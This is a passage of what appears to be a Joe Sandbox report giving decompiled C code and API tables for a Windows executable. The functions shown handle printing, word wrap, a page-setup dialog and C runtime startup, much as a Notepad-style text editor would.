                                                  0x010a1a23
                                                  0x010a1a34
                                                  0x010a1a45
                                                  0x010a1a4f
                                                  0x010a1a55
                                                  0x010a1a55
                                                  0x010a1a58
                                                  0x010a1a5d
                                                  0x010a1a5d
                                                  0x010a1a6a
                                                  0x010a1a71
                                                  0x010a1a8c
                                                  0x010a1a73
                                                  0x010a1a7f
                                                  0x010a1a85
                                                  0x010a1a85
                                                  0x010a1a95
                                                  0x010a1a9a
                                                  0x010a1a9c
                                                  0x010a1aa0
                                                  0x010a1aa0
                                                  0x010a1aa5
                                                  0x010a1b33
                                                  0x010a1b3a
                                                  0x010a1b95
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1ab6
                                                  0x010a1ab6
                                                  0x010a1ab6
                                                  0x010a1ab8
                                                  0x010a1abe
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1ac8
                                                  0x010a1b09
                                                  0x00000000
                                                  0x010a1b0b
                                                  0x010a1b0e
                                                  0x010a1b11
                                                  0x00000000
                                                  0x010a1b11
                                                  0x010a1aca
                                                  0x010a1aca
                                                  0x010a1ad0
                                                  0x010a1ad0
                                                  0x010a1ad9
                                                  0x010a1af9
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1adb
                                                  0x010a1ae3
                                                  0x010a1ae7
                                                  0x010a1aed
                                                  0x00000000
                                                  0x010a1aed
                                                  0x010a1b15
                                                  0x010a1b15
                                                  0x010a1b1e
                                                  0x010a1b29
                                                  0x010a1b29
                                                  0x010a1b31
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1b20
                                                  0x010a1b20
                                                  0x010a1b27
                                                  0x010a1b3c
                                                  0x010a1b58
                                                  0x010a1b5e
                                                  0x010a1b64
                                                  0x010a1b66
                                                  0x010a1b6e
                                                  0x010a1b71
                                                  0x010a1b73
                                                  0x010a1b77
                                                  0x010a1b80
                                                  0x010a1b86
                                                  0x010a1b89
                                                  0x010a1b8a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1b8a
                                                  0x010a1b80
                                                  0x010a1b8c
                                                  0x010a1b8e
                                                  0x010a1b90
                                                  0x010a1b98
                                                  0x010a1b98
                                                  0x010a1b98
                                                  0x010a1b8e
                                                  0x010a1b71
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1b27
                                                  0x00000000
                                                  0x010a1afb
                                                  0x010a1afb
                                                  0x010a1afc
                                                  0x00000000
                                                  0x010a1b01
                                                  0x00000000
                                                  0x010a1ac8
                                                  0x00000000
                                                  0x010a1ab6
                                                  0x010a1b9b
                                                  0x010a1b9f
                                                  0x010a1bb3
                                                  0x010a1bb9
                                                  0x010a1bb9
                                                  0x010a1bbc
                                                  0x010a1bbc
                                                  0x010a1bbf
                                                  0x010a1bc2
                                                  0x010a1be1
                                                  0x010a1be6
                                                  0x010a1be8
                                                  0x010a1bed
                                                  0x010a1bef
                                                  0x010a1bf5
                                                  0x010a1c01
                                                  0x010a1c07
                                                  0x00000000
                                                  0x010a1bf7
                                                  0x010a1bfa
                                                  0x010a1bff
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1c09
                                                  0x010a1c09
                                                  0x010a1c0c
                                                  0x010a1c10
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1c10
                                                  0x010a1bfa
                                                  0x00000000
                                                  0x010a1bf5
                                                  0x010a1be8
                                                  0x010a1c12
                                                  0x010a1c12
                                                  0x010a1bc4
                                                  0x010a1bcf
                                                  0x010a1bda
                                                  0x010a1bdd
                                                  0x010a1bdd
                                                  0x010a1c17
                                                  0x010a1c24
                                                  0x010a1c2b
                                                  0x010a1c81
                                                  0x00000000
                                                  0x010a1c2d
                                                  0x010a1c37
                                                  0x010a1c39
                                                  0x010a1c3f
                                                  0x010a1c49
                                                  0x010a1c4b
                                                  0x010a1c59
                                                  0x010a1c6c
                                                  0x010a1c76
                                                  0x010a1c7c
                                                  0x010a1c84
                                                  0x010a1c88
                                                  0x010a1c8b
                                                  0x010a1c8b
                                                  0x010a1c88
                                                  0x010a1c49
                                                  0x010a1c9b
                                                  0x010a1cac
                                                  0x010a19ba
                                                  0x010a19cc
                                                  0x010a19dc
                                                  0x00000000
                                                  0x010a19dc
                                                  0x010a19ad

                                                  APIs
                                                    • Part of subcall function 010A1890: GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A18F0
                                                    • Part of subcall function 010A1890: HeapAlloc.KERNEL32(00000000), ref: 010A18F7
                                                  • StartPage.GDI32 ref: 010A19B0
                                                  • MessageBoxW.USER32(StartPage failed,Print Error,00000030), ref: 010A19CC
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A19D5
                                                  • HeapFree.KERNEL32(00000000), ref: 010A19DC
                                                  • GetTextMetricsW.GDI32(?,?), ref: 010A19F2
                                                  • GetTextExtentPoint32W.GDI32(?,010C43B0,00000000), ref: 010A1A19
                                                  • ExtTextOutW.GDI32(?,?,?,00000004,?,010C43B0,00000000), ref: 010A1A4F
                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000), ref: 010A1A7F
                                                  • GetTextExtentExPointW.GDI32(?,00000000,?,00000000,?,00000000,?), ref: 010A1B58
                                                  • ExtTextOutW.GDI32(?,?,?,00000004,?,00000000,?,00000000), ref: 010A1BB3
                                                  • _memmove.LIBCMT ref: 010A1BCF
                                                  • GetTextExtentPoint32W.GDI32(?,?,00000000), ref: 010A1C3F
                                                  • lstrlenW.KERNEL32(?,00000000,?,?), ref: 010A1C59
                                                  • ExtTextOutW.GDI32(?,?,00000000,00000004,?,?,00000000), ref: 010A1C76
                                                  • EndPage.GDI32(?), ref: 010A1C8B
                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 010A1C94
                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 010A1C9B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Text$Heap$Extent$Point32Process$FreePage$AllocMessageMetricsPointStart_memmovelstrlen
                                                  • String ID: Print Error$StartPage failed
                                                  • API String ID: 1514916518-1681616764
                                                  • Opcode ID: c715c7e5aff2b88ee9ab638bd266860adb3502512a7afbf7e788e3d3105650e2
                                                  • Instruction ID: 1fd3a96bbde844559cde83e076cc4f915cf648cc8b05bce6663b29778c271b45
                                                  • Opcode Fuzzy Hash: c715c7e5aff2b88ee9ab638bd266860adb3502512a7afbf7e788e3d3105650e2
                                                  • Instruction Fuzzy Hash: 17B17A31610205EFEB20CF98C984FAAB7F9FF45310F548959FAD69B250E735A980CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A21F0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 97windowmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E010A21F0() {
				struct tagRECT _v20;
				void* _t10;
				int _t12;
				struct HWND__* _t18;
				signed int _t26;
				long _t30;
				void* _t31;
				void* _t34;
				int _t37;

				_t1 = GetWindowTextLengthW( *0x10c3f2c) + 1; // 0x1
				_t37 = _t1;
				_t10 = HeapAlloc(GetProcessHeap(), 0, _t37 + _t37);
				_t31 = _t10;
				if(_t31 != 0) {
					GetWindowTextW( *0x10c3f2c, _t31, _t37);
					_t12 = SendMessageW( *0x10c3f2c, 0xb8, 0, 0);
					DestroyWindow( *0x10c3f2c);
					GetClientRect( *0x10c3f24,  &_v20);
					_t17 =  !=  ? 0x50b000c4 : 0x50a00044;
					_t18 = CreateWindowExW(0x200, L"edit", 0,  !=  ? 0x50b000c4 : 0x50a00044, 0, 0, _v20.right, _v20.bottom,  *0x10c3f24, 0,  *0x10c3f20, 0);
					 *0x10c3f2c = _t18;
					SendMessageW(_t18, 0x30,  *0x10c3f30, 0);
					SetWindowTextW( *0x10c3f2c, _t31);
					SendMessageW( *0x10c3f2c, 0xb9, _t12, 0);
					SetFocus( *0x10c3f2c);
					HeapFree(GetProcessHeap(), 0, _t31);
					_t26 = 0 |  *0x10c3f9c == 0x00000000;
					 *0x10c3f9c = _t26;
					asm("sbb eax, eax");
					_t30 = CheckMenuItem(GetMenu( *0x10c3f24), 0x119,  ~_t26 & 0x00000008);
					__imp__#410( *0x10c3f2c, 0x10a2880, 0, 0, _t34);
					return _t30;
				}
				return _t10;
			}












                                                  0x010a2204
                                                  0x010a2204
                                                  0x010a2214
                                                  0x010a221a
                                                  0x010a221e
                                                  0x010a222d
                                                  0x010a2248
                                                  0x010a2252
                                                  0x010a2262
                                                  0x010a228c
                                                  0x010a22a3
                                                  0x010a22b1
                                                  0x010a22b9
                                                  0x010a22c2
                                                  0x010a22d6
                                                  0x010a22de
                                                  0x010a22ee
                                                  0x010a22fc
                                                  0x010a22ff
                                                  0x010a2306
                                                  0x010a231e
                                                  0x010a2333
                                                  0x00000000
                                                  0x010a2339
                                                  0x010a233f

                                                  APIs
                                                  • GetWindowTextLengthW.USER32 ref: 010A21FE
                                                  • GetProcessHeap.KERNEL32(00000000), ref: 010A220D
                                                  • HeapAlloc.KERNEL32(00000000), ref: 010A2214
                                                  • GetWindowTextW.USER32 ref: 010A222D
                                                  • SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A2248
                                                  • DestroyWindow.USER32 ref: 010A2252
                                                  • GetClientRect.USER32 ref: 010A2262
                                                  • CreateWindowExW.USER32 ref: 010A22A3
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 010A22B9
                                                  • SetWindowTextW.USER32(00000000), ref: 010A22C2
                                                  • SendMessageW.USER32(000000B9,00000000,00000000), ref: 010A22D6
                                                  • SetFocus.USER32 ref: 010A22DE
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A22E7
                                                  • HeapFree.KERNEL32(00000000), ref: 010A22EE
                                                  • GetMenu.USER32(00000119), ref: 010A2317
                                                  • CheckMenuItem.USER32(00000000), ref: 010A231E
                                                  • #410.COMCTL32(010A2880,00000000,00000000), ref: 010A2333
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Window$Heap$MessageSendText$MenuProcess$#410AllocCheckClientCreateDestroyFocusFreeItemLengthRect
                                                  • String ID: edit
                                                  • API String ID: 2317382731-2167791130
                                                  • Opcode ID: 4fb1c42572464a47442d786c0c4fa3d639d2f88abba13bbf4ceed1f38e5a6e98
                                                  • Instruction ID: 10edfe82064319b03e1315704a2249590825abf2de24a43de09c37d32d48b037
                                                  • Opcode Fuzzy Hash: 4fb1c42572464a47442d786c0c4fa3d639d2f88abba13bbf4ceed1f38e5a6e98
                                                  • Instruction Fuzzy Hash: F931ED72250206FFEB312BA1ED9AF963A79FB08701F108424F6C5A9198D77B58159F14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A2600 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 143windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A2600(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t21;
				void* _t48;
				void* _t61;
				struct HWND__* _t78;
				struct HWND__* _t79;

				_t21 = _a8 - 0x110;
				if(_t21 == 0) {
					_t78 = _a4;
					SetDlgItemTextW(_t78, 0x141, 0x10c4ca0);
					SetDlgItemTextW(_t78, 0x143, 0x10c4ea8);
					SetDlgItemInt(_t78, 0x14d, (0x51eb851f *  *0x10c4c90 >> 0x20 >> 5 >> 0x1f) + (0x51eb851f *  *0x10c4c90 >> 0x20 >> 5), 0);
					SetDlgItemInt(_t78, 0x150, (0x51eb851f *  *0x10c4c94 >> 0x20 >> 5 >> 0x1f) + (0x51eb851f *  *0x10c4c94 >> 0x20 >> 5), 0);
					SetDlgItemInt(_t78, 0x147, (0x51eb851f *  *0x10c4c98 >> 0x20 >> 5 >> 0x1f) + (0x51eb851f *  *0x10c4c98 >> 0x20 >> 5), 0);
					SetDlgItemInt(_t78, 0x14a, (0x51eb851f *  *0x10c4c9c >> 0x20 >> 5 >> 0x1f) + (0x51eb851f *  *0x10c4c9c >> 0x20 >> 5), 0);
					goto L9;
				} else {
					if(_t21 != 1) {
						L9:
						return 0;
					} else {
						_t48 = _a12 - 1;
						if(_t48 == 0) {
							_t79 = _a4;
							GetDlgItemTextW(_t79, 0x141, 0x10c4ca0, 0);
							GetDlgItemTextW(_t79, 0x143, 0x10c4ea8, 0);
							 *0x10c4c90 = GetDlgItemInt(_t79, 0x14d, 0, 0) * 0x64;
							 *0x10c4c94 = GetDlgItemInt(_t79, 0x150, 0, 0) * 0x64;
							 *0x10c4c98 = GetDlgItemInt(_t79, 0x147, 0, 0) * 0x64;
							 *0x10c4c9c = GetDlgItemInt(_t79, 0x14a, 0, 0) * 0x64;
							EndDialog(_t79, 1);
							return 1;
						} else {
							_t61 = _t48 - 1;
							if(_t61 == 0) {
								EndDialog(_a4, 2);
								return 1;
							} else {
								if(_t61 != 7) {
									goto L9;
								} else {
									MessageBoxW( *0x10c3f24, L"Sorry, no help available", L"Help", 0x30);
									return 1;
								}
							}
						}
					}
				}
			}








                                                  0x010a2608
                                                  0x010a260d
                                                  0x010a26f6
                                                  0x010a270a
                                                  0x010a2717
                                                  0x010a273d
                                                  0x010a275d
                                                  0x010a277d
                                                  0x010a279d
                                                  0x00000000
                                                  0x010a2613
                                                  0x010a2614
                                                  0x010a27a0
                                                  0x010a27a4
                                                  0x010a261a
                                                  0x010a261d
                                                  0x010a261e
                                                  0x010a2665
                                                  0x010a267b
                                                  0x010a268a
                                                  0x010a26ab
                                                  0x010a26bf
                                                  0x010a26d3
                                                  0x010a26e0
                                                  0x010a26e5
                                                  0x010a26f3
                                                  0x010a2620
                                                  0x010a2620
                                                  0x010a2621
                                                  0x010a2654
                                                  0x010a2662
                                                  0x010a2623
                                                  0x010a2626
                                                  0x00000000
                                                  0x010a262c
                                                  0x010a263e
                                                  0x010a264c
                                                  0x010a264c
                                                  0x010a2626
                                                  0x010a2621
                                                  0x010a261e
                                                  0x010a2614

                                                  APIs
                                                  • MessageBoxW.USER32(Sorry, no help available,Help,00000030), ref: 010A263E
                                                  • EndDialog.USER32(?,00000002), ref: 010A2654
                                                  • GetDlgItemTextW.USER32(?,00000141,010C4CA0,00000000), ref: 010A267B
                                                  • GetDlgItemTextW.USER32(?,00000143,010C4EA8,00000000), ref: 010A268A
                                                  • GetDlgItemInt.USER32(?,0000014D,00000000,00000000), ref: 010A269C
                                                  • GetDlgItemInt.USER32(?,00000150,00000000,00000000), ref: 010A26B0
                                                  • GetDlgItemInt.USER32(?,00000147,00000000,00000000), ref: 010A26C4
                                                  • GetDlgItemInt.USER32(?,0000014A,00000000,00000000), ref: 010A26D8
                                                  • EndDialog.USER32(?,00000001), ref: 010A26E5
                                                  • SetDlgItemTextW.USER32 ref: 010A270A
                                                  • SetDlgItemTextW.USER32 ref: 010A2717
                                                  • SetDlgItemInt.USER32(?,0000014D,?,00000000), ref: 010A273D
                                                  • SetDlgItemInt.USER32(?,00000150,?,00000000), ref: 010A275D
                                                  • SetDlgItemInt.USER32(?,00000147,?,00000000), ref: 010A277D
                                                  • SetDlgItemInt.USER32(?,0000014A,?,00000000), ref: 010A279D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Item$Text$Dialog$Message
                                                  • String ID: Help$Sorry, no help available
                                                  • API String ID: 3223884555-856071037
                                                  • Opcode ID: 6d091967fcdedace25d588154406a258791e7b57040edebcef3ca7aebf525512
                                                  • Instruction ID: 28fe9ae9913a805be3ec31335ef15df6bf296d206d16ef08df91510d8753adf1
                                                  • Opcode Fuzzy Hash: 6d091967fcdedace25d588154406a258791e7b57040edebcef3ca7aebf525512
                                                  • Instruction Fuzzy Hash: 3441A9317903087BF62417ADAC83FBA7AA9E7D4F10F044036F385EE2D4C6E5A9015B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010B6728 Relevance: 24.1, APIs: 16, Instructions: 92COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010B6728(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr* _t45;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t45 = E010A8C83(8, 1);
					if(_t45 != 0) {
						_t12 = E010A8C83(0xb8, 1);
						 *_t45 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E010A8C83(0x220, 1);
							 *((intOrPtr*)(_t45 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E010B6250( *_t45, 0x10c1da0);
								__eflags = E010B6B48(__ebx, __edx, 1, _t45,  *_t45, _a4, _a8);
								if(__eflags != 0) {
									_t17 = E010A97EB(__edx, 1, __eflags,  *((intOrPtr*)( *_t45 + 4)),  *((intOrPtr*)(_t45 + 4)));
									__eflags = _t17;
									if(_t17 == 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)))) = 1;
										L17:
										return _t45;
									}
									E010A8C4B( *((intOrPtr*)(_t45 + 4)));
									E010AEB5D( *_t45);
									E010AEA03( *_t45);
									E010A8C4B(_t45);
									L15:
									_t45 = 0;
									goto L17;
								}
								E010AEB5D( *_t45);
								E010AEA03( *_t45);
								E010A8C4B(_t45);
								goto L15;
							}
							E010A8C4B( *_t45);
							E010A8C4B(_t45);
							L8:
							goto L3;
						}
						E010A8C4B(_t45);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E010A6117())) = 0xc;
					goto L4;
				}
			}










                                                  0x010b6731
                                                  0x010b6757
                                                  0x00000000
                                                  0x010b6739
                                                  0x010b6744
                                                  0x010b674a
                                                  0x010b6763
                                                  0x010b676a
                                                  0x010b676c
                                                  0x010b676e
                                                  0x010b677f
                                                  0x010b6786
                                                  0x010b6789
                                                  0x010b678b
                                                  0x010b67a4
                                                  0x010b67b9
                                                  0x010b67bb
                                                  0x010b67de
                                                  0x010b67e5
                                                  0x010b67e7
                                                  0x010b680f
                                                  0x010b6811
                                                  0x00000000
                                                  0x010b6811
                                                  0x010b67ec
                                                  0x010b67f3
                                                  0x010b67fa
                                                  0x010b6800
                                                  0x010b6808
                                                  0x010b6808
                                                  0x00000000
                                                  0x010b6808
                                                  0x010b67bf
                                                  0x010b67c6
                                                  0x010b67cc
                                                  0x00000000
                                                  0x010b67d1
                                                  0x010b678f
                                                  0x010b6795
                                                  0x010b6776
                                                  0x00000000
                                                  0x010b6776
                                                  0x010b6771
                                                  0x00000000
                                                  0x010b6771
                                                  0x010b674c
                                                  0x010b6751
                                                  0x00000000
                                                  0x010b6751

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                  • String ID:
                                                  • API String ID: 2661855409-0
                                                  • Opcode ID: a2e9e089b6541f68af114566a0688c3dd7f117c710c7ee7af15b200ca94d0fe3
                                                  • Instruction ID: b6698b5b4b186e8a0a6ae6b62b97c6a8c6a6124a953df3f5ee8031f81c8378b5
                                                  • Opcode Fuzzy Hash: a2e9e089b6541f68af114566a0688c3dd7f117c710c7ee7af15b200ca94d0fe3
                                                  • Instruction Fuzzy Hash: 9F213431045606EAEB223FA8DC48ECEBFE5FF61752B50846EE4C555061FF3398408A64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A3CF5 Relevance: 21.1, APIs: 14, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t17;
				void* _t24;
				void* _t25;
				void* _t26;
				signed int _t38;
				void* _t47;
				signed int _t50;
				void* _t52;
				void* _t54;

				_t48 = __edi;
				_t47 = __edx;
				E010A7F04();
				_push(0x14);
				_push(0x10befc0);
				E010A61F0(__ebx, __edi, __esi);
				_t50 = E010A80DD() & 0x0000ffff;
				E010A4843(2);
				_t54 =  *0x10a0000 - 0x5a4d; // 0x5a4d
				if(_t54 == 0) {
					_t17 =  *0x10a003c; // 0xe8
					__eflags =  *((intOrPtr*)(_t17 + 0x10a0000)) - 0x4550;
					if( *((intOrPtr*)(_t17 + 0x10a0000)) != 0x4550) {
						goto L2;
					} else {
						__eflags =  *((intOrPtr*)(_t17 + 0x10a0018)) - 0x10b;
						if( *((intOrPtr*)(_t17 + 0x10a0018)) != 0x10b) {
							goto L2;
						} else {
							_t38 = 0;
							__eflags =  *((intOrPtr*)(_t17 + 0x10a0074)) - 0xe;
							if( *((intOrPtr*)(_t17 + 0x10a0074)) > 0xe) {
								__eflags =  *(_t17 + 0x10a00e8);
								_t6 =  *(_t17 + 0x10a00e8) != 0;
								__eflags = _t6;
								_t38 = 0 | _t6;
							}
						}
					}
				} else {
					L2:
					_t38 = 0;
				}
				 *(_t52 - 0x1c) = _t38;
				if(E010A7BCC() == 0) {
					E010A3E89(_t38, _t47, _t48, _t50, 0x1c);
				}
				if(E010A7B33(_t38, _t48) == 0) {
					_t19 = E010A3E89(_t38, _t47, _t48, _t50, 0x10);
				}
				E010A7F9E(_t19);
				 *(_t52 - 4) =  *(_t52 - 4) & 0x00000000;
				E010A7347();
				 *0x10c3f18 = GetCommandLineA();
				 *0x10c2120 = E010A7FDE();
				_t24 = E010A7BF6();
				_t57 = _t24;
				if(_t24 < 0) {
					E010A44DD(_t38, _t47, _t48, _t50, _t57, 8);
				}
				_t25 = E010A7E23(_t38, _t47);
				_t58 = _t25;
				if(_t25 < 0) {
					E010A44DD(_t38, _t47, _t48, _t50, _t58, 9);
				}
				_t26 = E010A4517(_t48, _t50, 1);
				_t59 = _t26;
				if(_t26 != 0) {
					E010A44DD(_t38, _t47, _t48, _t50, _t59, _t26);
				}
				_t51 = E010A28A0(_t47, _t59, 0x10a0000, 0, E010A8183(), _t50);
				 *((intOrPtr*)(_t52 - 0x24)) = _t28;
				if(_t38 == 0) {
					E010A47CD(_t51);
				}
				E010A4508();
				 *(_t52 - 4) = 0xfffffffe;
				return E010A6235(_t51);
			}












                                                  0x010a3cf5
                                                  0x010a3cf5
                                                  0x010a3cf5
                                                  0x010a3cff
                                                  0x010a3d01
                                                  0x010a3d06
                                                  0x010a3d10
                                                  0x010a3d15
                                                  0x010a3d20
                                                  0x010a3d27
                                                  0x010a3d2d
                                                  0x010a3d32
                                                  0x010a3d3c
                                                  0x00000000
                                                  0x010a3d3e
                                                  0x010a3d43
                                                  0x010a3d4a
                                                  0x00000000
                                                  0x010a3d4c
                                                  0x010a3d4c
                                                  0x010a3d4e
                                                  0x010a3d55
                                                  0x010a3d57
                                                  0x010a3d5d
                                                  0x010a3d5d
                                                  0x010a3d5d
                                                  0x010a3d5d
                                                  0x010a3d55
                                                  0x010a3d4a
                                                  0x010a3d29
                                                  0x010a3d29
                                                  0x010a3d29
                                                  0x010a3d29
                                                  0x010a3d60
                                                  0x010a3d6a
                                                  0x010a3d6e
                                                  0x010a3d73
                                                  0x010a3d7b
                                                  0x010a3d7f
                                                  0x010a3d84
                                                  0x010a3d85
                                                  0x010a3d8a
                                                  0x010a3d8e
                                                  0x010a3d99
                                                  0x010a3da3
                                                  0x010a3da8
                                                  0x010a3dad
                                                  0x010a3daf
                                                  0x010a3db3
                                                  0x010a3db8
                                                  0x010a3db9
                                                  0x010a3dbe
                                                  0x010a3dc0
                                                  0x010a3dc4
                                                  0x010a3dc9
                                                  0x010a3dcc
                                                  0x010a3dd2
                                                  0x010a3dd4
                                                  0x010a3dd7
                                                  0x010a3ddc
                                                  0x010a3df0
                                                  0x010a3df2
                                                  0x010a3df7
                                                  0x010a3dfa
                                                  0x010a3dfa
                                                  0x010a3dff
                                                  0x010a3e34
                                                  0x010a3e42

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInfoInitializeLineStartupStrings___crt___security_init_cookie__cinit__ioinit0__setargv__setenvp__wincmdln
                                                  • String ID:
                                                  • API String ID: 505799540-0
                                                  • Opcode ID: 4fccd157fe94d333a7eaf6cf35a1c31cb0a613b4942d5e277b8e572f4a5275fb
                                                  • Instruction ID: bb0d11083d0c81fca1b6b01f832cb33cfc5d6ab3b3a98d697324626250d2dd96
                                                  • Opcode Fuzzy Hash: 4fccd157fe94d333a7eaf6cf35a1c31cb0a613b4942d5e277b8e572f4a5275fb
                                                  • Instruction Fuzzy Hash: E321D374A4030BDADB607BF4B845FEE3194BF20705FD4816AF6C49E0C6EFB689408691
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A43D6 Relevance: 19.6, APIs: 13, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E010A43D6(void* __eax, void* __ebx) {
				intOrPtr _t5;
				LONG* _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;

				_t14 = __ebx;
				__imp__DecodePointer( *0x10c3f08);
				_t25 =  *0x10c2140;
				_t24 = __eax;
				if(_t25 != 0) {
					while( *_t25 != 0) {
						E010A8C4B( *_t25);
						_t25 = _t25 + 4;
						if(_t25 != 0) {
							continue;
						}
						break;
					}
					_t25 =  *0x10c2140;
				}
				_push(_t14);
				E010A8C4B(_t25);
				_t26 =  *0x10c213c;
				 *0x10c2140 = 0;
				if(_t26 != 0) {
					while( *_t26 != 0) {
						E010A8C4B( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0x10c213c;
				}
				E010A8C4B(_t26);
				 *0x10c213c = 0;
				E010A8C4B( *0x10c2138);
				_t5 = E010A8C4B( *0x10c2134);
				 *0x10c2138 = 0;
				 *0x10c2134 = 0;
				if(_t24 != 0xffffffff) {
					_t5 = E010A8C4B(_t24);
				}
				__imp__EncodePointer(0);
				 *0x10c3f08 = _t5;
				_t6 =  *0x10c2a50;
				if( *0x10c2a50 != 0) {
					E010A8C4B(_t6);
					 *0x10c2a50 = 0;
				}
				_t7 =  *0x10c2a54;
				if( *0x10c2a54 != 0) {
